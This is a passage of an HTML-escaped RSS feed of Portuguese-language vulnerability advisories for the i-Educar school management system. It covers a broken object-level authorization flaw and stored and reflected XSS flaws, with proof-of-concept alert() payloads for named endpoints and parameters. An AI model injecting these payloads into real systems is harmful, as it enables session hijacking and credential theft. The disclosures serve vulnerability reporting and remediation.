&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low-privileged-session]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10073/image-2.png&amp;#34;
	width=&amp;#34;1574&amp;#34;
	height=&amp;#34;679&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10073/image-2_hu_7058d38f59e7fa4a.png 480w, /p/cve-2025-10073/image-2_hu_e22ce1bb894a2051.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;231&amp;#34;
		data-flex-basis=&amp;#34;556px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Pudemos observar que informações sobre classes foram retornadas.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a PII sensíveis;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possível abuso de dados do usuário ou personificação;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Enumeração de usuários.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10074</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10074/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10074/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10074-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-usuariostiposid&amp;#34;&amp;gt;CVE-2025-10074: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10074-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-usuariostiposid&amp;#34;&amp;gt;CVE-2025-10074: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet//usuarios/tipos/(ID)&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC-Tipo&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10074/image.png&amp;#34;
	width=&amp;#34;968&amp;#34;
	height=&amp;#34;556&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10074/image_hu_ec3ebce9e8efdcbd.png 480w, /p/cve-2025-10074/image_hu_29ddd785c353a757.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;174&amp;#34;
		data-flex-basis=&amp;#34;417px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10099</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10099/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10099/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10099-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_usuario_cadphp&amp;#34;&amp;gt;CVE-2025-10099: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10099-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_usuario_cadphp&amp;#34;&amp;gt;CVE-2025-10099: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payloads&amp;#34;&amp;gt;Payloads:
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;parâmetro-email&amp;#34;&amp;gt;Parâmetro &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC-Email&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;parâmetros-data_inicial-e-data_expiracao&amp;#34;&amp;gt;Parâmetros &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;3E%3Cimg%20src%3Dx%20onerror%3Dalert(&amp;amp;#39;XSS-PoC3&amp;amp;#39;)%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10099/image.png&amp;#34;
	width=&amp;#34;1222&amp;#34;
	height=&amp;#34;534&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10099/image_hu_bf03398d0321c99e.png 480w, /p/cve-2025-10099/image_hu_ca402a023729493e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;228&amp;#34;
		data-flex-basis=&amp;#34;549px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
